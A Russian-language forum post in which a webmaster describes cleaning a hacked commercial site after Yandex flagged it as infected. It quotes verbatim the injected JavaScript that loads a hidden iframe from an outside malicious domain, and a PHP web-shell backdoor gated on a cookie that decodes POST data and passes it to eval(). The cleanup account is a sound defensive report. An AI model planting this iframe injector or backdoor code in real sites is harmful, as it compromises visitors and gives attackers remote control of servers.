Приветствую братья по оружию. Столкнулся с проблемой: наш "любимый Яндекс" добавил мой сайт с список зараженных. Самое обидное, что произошло все в праздники. Сайт коммерческий, делал сам для себя. Изменааааа ! Чего делать непонятно. Куда звонить, куда бежать. Судорожно начал писать хостеру, в Яндекс . Сами понимаете, всем по барабану. Надо отдать должное Яндекс, оперативно ответили и код выслали.
Здравствуйте, Сергей!
При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в .js-скриптах вредоносный код следующего содержания:
/*214afaae*/(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset))!== -1) {
return index;
}
return false;
}
function papirosa(){
var denyList = ['Chrome'];
var denyUA = false;
for (var i in denyList) {
if (stripos(navigator.userAgent, denyList)) {
denyUA = true;
break;
}
}
return denyUA;
}
function setCookie(name, value, expires) {
var date = new Date( new Date().getTime() + expires*1000 );
document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
}
function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
return matches ? decodeURIComponent(matches[1]) : undefined;
}
if (!papirosa()) {
var cookie = getCookie('b19ad018sc');
if (cookie == undefined) {
setCookie('b19ad018sc', true, 292200);
document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://volumessequencers.ru/yw46.REfcXpBZ?default"></iframe>');
}
};
})();/*eaa795220*
Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. Вскоре после этого антивирус перепроверит сайт и, если опасное содержимое более не будет обнаружено, пометка в выдаче снимется.
Победил енту гадость следующим способом:
1.Стал смотреть структуру папок и нашел почти в каждой, файлы типа 12qwe22.php , ff2600.php и т.д. выяснил, что все они были изменены в одно время.
2.Открыл в
Notepad++ и увидел, что они все одинаковые, вот что там было
<?php echo "#!!#";
3.Решил удалять ручками, но после 1-го часа понял, что сойду с ума !
4.Нашел такую тулзу: FAR , очень удобно, выбирает только те файлы в которых есть только это сочетание. ( было около 1300 таких файлов )
5.Стал смотреть дальше, увидел схожие файлы : gg4409gg.php и т.д. , но дата была месяцем раньше, вот такая бяка там была :
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
echo '<textarea id=areatext>';
eval($msg);
echo '</textarea>bg';
exit;
}}
?>
6.Проделал пункт №4 , их оказалось чуть меньше
( около 70 )
7.Стал дальше копаться и мне не понравился один файл ( странный он какой-то ) - jos_9hpq.php , решил скачать с сервака и посмотреть в
Notepad++ что за зверь такой. И БИНГО ! Nod32 завизжал, как резаный.
8.Удалил и отправил к ним
Пусть изучают !
9.Потом конечно очень на это чудо посмотреь, хотел проверить dr.web он-лайн, не дал его просканировать. Какая-то защита.
10.И вуаля, Яндекс сказал все в порядке.
Пьем уже пиво, а не корвалол.
Надеюсь мой опыт кому-нибудь поможет.